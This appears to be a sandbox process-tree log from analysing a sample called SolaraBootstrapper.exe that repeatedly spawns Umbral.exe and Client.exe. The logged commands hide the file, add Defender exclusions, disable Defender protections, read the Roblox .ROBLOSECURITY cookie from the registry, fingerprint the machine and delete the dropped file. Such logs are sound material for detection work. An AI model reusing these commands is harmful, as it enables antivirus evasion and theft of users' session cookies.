        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        44⤵
        
        PID:1304
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        45⤵
        
        PID:3080
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        45⤵
        
        PID:2276
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        45⤵
        
        PID:5064
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        44⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        44⤵
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        43⤵
        
        PID:1728
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        44⤵
        
        PID:4088
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        44⤵
        Views/modifies file attributes
        
        PID:4480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        44⤵
        
        PID:3632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        44⤵
        
        PID:3124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        44⤵
        
        PID:4824
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        44⤵
        
        PID:3236
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        45⤵
        
        PID:2836
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        44⤵
        
        PID:3452
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        44⤵
        
        PID:376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        44⤵
        
        PID:1472
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        44⤵
        Detects videocard installed
        
        PID:872
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        43⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        42⤵
        
        PID:1356
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        42⤵
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        41⤵
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        41⤵
        
        PID:1696
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        40⤵
        
        PID:948
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        40⤵
        
        PID:5036
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        39⤵
        Drops file in Drivers directory
        
        PID:5020
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        40⤵
        
        PID:1092
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        40⤵
        Views/modifies file attributes
        
        PID:3332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        40⤵
        
        PID:3984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        40⤵
        
        PID:1468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        40⤵
        
        PID:4332
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        40⤵
        
        PID:4088
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        40⤵
        
        PID:2836
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        40⤵
        
        PID:5016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        40⤵
        
        PID:2312
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        40⤵
        Detects videocard installed
        
        PID:2224
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        40⤵
        
        PID:4808
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        41⤵
        Runs ping.exe
        
        PID:2768
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        39⤵
        
        PID:1304
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        38⤵
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        38⤵
        
        PID:4212
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        37⤵
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        37⤵
        
        PID:5036
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        36⤵
        Drops file in Drivers directory
        
        PID:4756
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        37⤵
        
        PID:1728
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        37⤵
        Views/modifies file attributes
        
        PID:1112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        37⤵
        
        PID:1356
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        38⤵
        
        PID:3452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        37⤵
        
        PID:4196
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        38⤵
        
        PID:2156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        37⤵
        
        PID:2948
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        37⤵
        
        PID:2224
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        38⤵
        
        PID:1112
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        37⤵
        
        PID:1500
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        37⤵
        
        PID:4320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        37⤵
        
        PID:1104
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        37⤵
        Detects videocard installed
        
        PID:2416
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        37⤵
        
        PID:2016
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        38⤵
        Runs ping.exe
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        36⤵
        
        PID:4124
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        35⤵
        
        PID:3804
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        35⤵
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        34⤵
        
        PID:1304
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        34⤵
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        33⤵
        Executes dropped EXE
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        33⤵
        Executes dropped EXE
        
        PID:5100
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        32⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2804
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:1784
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        33⤵
        Views/modifies file attributes
        
        PID:3308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        33⤵
        
        PID:4592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        
        PID:2180
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        
        PID:2156
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        33⤵
        
        PID:1492
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        33⤵
        
        PID:1728
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:3308
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:2576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        33⤵
        
        PID:3992
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        33⤵
        Detects videocard installed
        
        PID:3452
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        33⤵
        
        PID:3044
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        34⤵
        Runs ping.exe
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        32⤵
        Executes dropped EXE
        
        PID:4320
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        31⤵
        Executes dropped EXE
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        31⤵
        Executes dropped EXE
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        30⤵
        Executes dropped EXE
        
        PID:3560
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        30⤵
        Executes dropped EXE
        
        PID:2100
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        29⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2000
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        30⤵
        
        PID:3060
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        30⤵
        Views/modifies file attributes
        
        PID:4500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2824
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:4780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        30⤵
        
        PID:4404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        
        PID:4428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        
        PID:3568
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        30⤵
        
        PID:1860
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        30⤵
        
        PID:3052
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        30⤵
        
        PID:3100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        30⤵
        
        PID:4136
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        30⤵
        Detects videocard installed
        
        PID:1304
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        30⤵
        
        PID:4896
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        31⤵
        Runs ping.exe
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        29⤵
        Executes dropped EXE
        
        PID:2528
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        28⤵
        Executes dropped EXE
        
        PID:3332
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        28⤵
        Executes dropped EXE
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        27⤵
        Executes dropped EXE
        
        PID:388
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        27⤵
        Executes dropped EXE
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        26⤵
        Executes dropped EXE
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        26⤵
        Executes dropped EXE
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        25⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4584
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:4136
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        26⤵
        Views/modifies file attributes
        
        PID:1500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        26⤵
        
        PID:5088
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:1136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        
        PID:4592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        
        PID:3464
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        26⤵
        
        PID:1708
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        26⤵
        
        PID:1092
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:1000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        26⤵
        
        PID:3120
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        26⤵
        Detects videocard installed
        
        PID:4780
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        26⤵
        
        PID:1360
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        27⤵
        Runs ping.exe
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        25⤵
        Executes dropped EXE
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        24⤵
        Executes dropped EXE
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        24⤵
        Executes dropped EXE
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        23⤵
        Executes dropped EXE
        
        PID:2280
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        23⤵
        Executes dropped EXE
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        22⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4916
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:1456
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        23⤵
        Views/modifies file attributes
        
        PID:1136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4260
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:4440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        23⤵
        
        PID:4568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        
        PID:208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        
        PID:1336
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:3568
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        23⤵
        
        PID:3560
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        23⤵
        
        PID:3060
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:5016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        23⤵
        
        PID:4440
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        23⤵
        Detects videocard installed
        
        PID:464
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        23⤵
        
        PID:4588
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        24⤵
        Runs ping.exe
        
        PID:5108
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        22⤵
        Executes dropped EXE
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        21⤵
        Executes dropped EXE
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        21⤵
        Executes dropped EXE
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        20⤵
        Executes dropped EXE
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\Client.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        20⤵
        Executes dropped EXE
        
        PID:2100
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        19⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:3896
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        20⤵
        
        PID:4848
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        20⤵
        Views/modifies file attributes
        
        PID:1708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        20⤵
        
        PID:2528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        20⤵
        
        PID:4440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
